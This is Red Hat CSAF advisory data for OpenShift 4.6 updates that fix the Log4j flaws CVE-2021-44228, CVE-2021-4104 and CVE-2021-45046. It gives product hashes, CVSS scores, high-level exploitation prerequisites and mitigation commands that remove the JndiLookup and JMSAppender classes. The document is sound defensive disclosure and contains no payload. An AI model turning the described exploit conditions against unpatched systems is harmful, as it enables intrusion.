"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": 
"Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. 
\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", 
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T06:12:27+00:00", "details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated 
shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5106" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", 
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x", "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x", "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64", 
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
rhsa-2021_5141
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Container Platform release 4.6.52 is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5141", "url": "https://access.redhat.com/errata/RHSA-2021:5141" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "2031667", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667" }, { "category": "external", "summary": "2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5141.json" } ], "title": "Red Hat Security Advisory: OpenShift Container Platform 4.6.52 security update", "tracking": { "current_release_date": "2024-12-12T01:19:16+00:00", "generator": { "date": "2024-12-12T01:19:16+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5141", "initial_release_date": "2021-12-16T07:50:00+00:00", "revision_history": [ { "date": "2021-12-16T07:50:00+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-16T07:50:00+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:19:16+00:00", "number": 
"3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift Container Platform 4.6", "product": { "name": "Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:4.6::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "product": { "name": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "product_id": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hadoop\u0026tag=v4.6.0-202112150545.p0.gf381145.assembly.art3595" } } }, { "category": "product_version", "name": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "product": { "name": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "product_id": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.6.0-202112150545.p0.gd74112d.assembly.art3595" } } }, { "category": "product_version", "name": 
"openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "product": { "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.6.0.202112150545.p0.gd74112d.assembly.art3595-1" } } }, { "category": "product_version", "name": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64", "product": { "name": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64", "product_id": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-presto\u0026tag=v4.6.0-202112150545.p0.g190688a.assembly.art3595" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64 as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64" }, 
"product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64 as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64" }, "product_reference": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64 as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64" }, "product_reference": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64 as a component of Red Hat OpenShift Container Platform 4.6", "product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" }, "product_reference": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64", "relates_to_product_reference": "8Base-RHOSE-4.6" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-4104", 
"cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-13T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2031667" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker\u0027s JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender", "title": "Vulnerability summary" }, { "category": "other", "text": "Based on the conditions to be exploitable (see details below), the risk is much lower than Log4j 2.x and Red Hat has assessed this to be Moderate severity. This flaw has been filed for Log4j 1.x, and the corresponding flaw information for Log4j 2.x is available at: https://access.redhat.com/security/cve/CVE-2021-44228\n\nNote this flaw ONLY affects applications which are specifically configured to use JMSAppender, which is not the default, or when the attacker has write access to the Log4j configuration for adding JMSAppender to the attacker\u0027s JNDI LDAP endpoint. \n\nIf the Log4j configuration is set TopicBindingName or TopicConnectionFactoryBindingName configurations allowing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228 Log4j 2.x, Log4j 1.x is vulnerable. 
However, the attack vector is reduced as it depends on having write access, which is not a standard configuration rather than untrusted user input. These are sufficient factors beyond the attacker\u0027s control.\n\nThe tomcat package shipped with Red Hat Enterprise Linux does not include log4j but it does include a default configuration for log4j, log4j.properties, which could be used with tomcat if users choose to install and configure the library. The JMSAppender is not enabled by default, and the permissions of the file can only be modified as root.\n\nRed Hat Virtualization ships log4j12-1.2.17, but it is used and configured in a way which makes this flaw not possible to exploit. Therefore impact is rated Low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-4104" }, { "category": "external", "summary": "RHBZ#2031667", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667" }, { "category": "external", "summary": "RHSB-2021-009", "url": 
"https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-4104", "url": "https://www.cve.org/CVERecord?id=CVE-2021-4104" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104" }, { "category": "external", "summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", "url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126" }, { "category": "external", "summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301", "url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301" }, { "category": "external", "summary": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx", "url": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/13/1", "url": "https://www.openwall.com/lists/oss-security/2021/12/13/1" } ], "release_date": "2021-12-10T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T07:50:00+00:00", "details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ], 
"restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5141" }, { "category": "workaround", "details": "These are the possible mitigations for this flaw for releases version 1.x:\n\n- Comment out or remove JMSAppender in the Log4j configuration if it is used\n- Remove the JMSAppender class from the classpath. For example:\n```\nzip -q -d log4j-*.jar org/apache/log4j/net/JMSAppender.class\n```\n- Restrict access for the OS user on the platform running the application to prevent modifying the Log4j configuration by the attacker.", "product_ids": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64", "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64", 
